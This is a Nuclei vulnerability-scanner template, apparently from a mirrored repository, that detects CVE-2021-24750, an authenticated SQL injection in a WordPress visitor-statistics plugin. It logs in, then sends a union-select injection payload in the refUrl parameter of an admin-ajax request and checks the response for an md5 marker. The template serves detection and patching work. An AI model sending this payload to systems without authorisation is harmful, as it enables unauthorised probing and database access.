daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2021/CVE-2021-24750.yaml

59 lines
2.6 KiB
YAML
Raw Blame History

id: CVE-2021-24750
info:
name: WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection
author: cckuakilong
severity: high
description: WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
remediation: |
Update to the latest version of the WordPress Visitor Statistics (Real Time Traffic) plugin (version 4.8 or higher) to mitigate the SQL Injection vulnerability.
reference:
- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
- https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de
- https://plugins.trac.wordpress.org/changeset/2622268
- https://nvd.nist.gov/vuln/detail/CVE-2021-24750
- https://github.com/WhooAmii/POC_to_review
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-24750
cwe-id: CWE-89
epss-score: 0.02059
epss-percentile: 0.88991
cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\):*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: wp_visitor_statistics_\(real_time_traffic\)_project
product: wp_visitor_statistics_\(real_time_traffic\)
framework: wordpress
tags: cve2021,cve,authenticated,wpscan,sqli,wp,wordpress,wp-plugin,wp_visitor_statistics_\(real_time_traffic\)_project
variables:
num: "999999999"
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'
- type: status
status:
- 200
# digest: 4a0a00473045022066f963610956751aad95f5b686b34695f912af8f37326c25b6fec6f8db31d602022100d6ba059cd38cb02845d4f79da8521497306aca3671c3231f9b17d54f08b1c05f:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink